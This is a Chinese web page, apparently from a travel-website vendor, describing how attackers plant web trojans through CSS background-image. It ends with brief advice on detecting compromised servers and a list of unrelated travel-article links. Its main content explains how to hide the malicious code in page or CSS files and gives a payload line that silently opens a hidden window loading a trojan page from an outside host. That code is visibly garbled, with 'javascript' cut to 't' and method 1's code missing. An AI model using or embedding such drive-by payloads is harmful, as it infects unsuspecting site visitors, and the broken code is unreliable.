旅游网站管理系统攻防CSS挂马实录
方式1:
Body
“background-image”在CSS中的主要功能是用来定义页面的背景图片。这是最典型的CSS挂马方式,这段恶意代码主要是通过“background-image”配合t代码让网页木马悄悄地在用户的电脑中运行。
那如何将这段CSS恶意代码挂到正常的网页中去呢?黑客可以将生成好的网页木马放到自己指定的位置,然后将该段恶意代码写入挂马网站的网页中,或者挂马网页所调用的CSS文件中。
小百科:
使用Body对象元素,主要是为了让对象不再改变整个网页文档的内容,通过Body对象的控制,可以将内容或者效果控制在指定的大小内,如同使用DIV对象那样精确地设置大小。
方式2:
Body
background-image: url(t:open("http://www.X.com/muma.htm","newwindow","border="1" Height=0, Width=0, top=1000, center=0, toolbar=no,menubar=no, scrollbars=no,resizable=no,location=no,status=no"))
方式1的CSS挂马技术,在运行时会出现空白的页面,影响网页访问者正常的访问,因此比较容易发现。不过在方式2中的这段代码,使用了t的Open开窗,通过新开一个隐藏的窗口,在后台悄悄地运行新窗口并激活访问网页溢出木马页面,不会影响访问者观看网页内容,因此更加隐蔽。
防网络服务器被挂马,通常会出现防病毒软件告警之类的信息。由于漏洞不断更新,挂马种类时刻都在变换,通过客户端的反映来发现服务器是否被挂马往往疏漏较大。正确的做法是经常检查服务器日志,发现异常信息,经常检查网站代码,使用网页木马检测系统,进行排查。
- 1旅游网站制作的形成
- 2酒店网上预定佣金收入模式能持续多久
- 3旅游网站建设战略专家简介
- 4投资中国旅游网站模板
- 5十一假期聪明人旅行必备之物
- 62011年旅游工作目标任务的七项工作
- 7旅游创新营销进入超级企业联盟时代
- 8旅游网站建设之增强对文化的发掘力度
- 9君山岛节庆旅游营销案例分析默认分类
- 10旅游网站建设之国家旅游局和国电旅游形象宣传合作框架协议
- 11旅游营销之知名网站为获利“肉搏”
- 12网站对旅行社的重要性
- 13兴安盟大力抓好旅游线路营销景区建设
- 14浅析意境流视角下的边缘型古镇旅游营销战略研究——以芙蓉古镇为例
- 15芙蓉古镇旅游网站管理系统现状
- 16模块的具体划分和分析
- 17《非诚2》助力北京旅游业4000亿起步 多公司受益
- 18旅游网站制作微观环境中的旅游购买者
- 19红色旅游的起点----中江
- 20旅游网站制作商业模式分析的启示
- 21旅游网站管理系统之中国将成全球第二大旅游市场
- 22旅游网站建设的法律环境
- 23探析我国旅游市场网络旅游营销创新与管理
- 24旅游网站管理系统选择静态页面的好处
- 25旅行社管理系统--国内旅行社面对的问题
- 26全国旅游营销信息化工作会议在济南召开
- 27我国旅游电子商务网站浅析
- 28旅游营销策划必要7点
- 29旅游网站建设动的核心
- 30品牌营销十问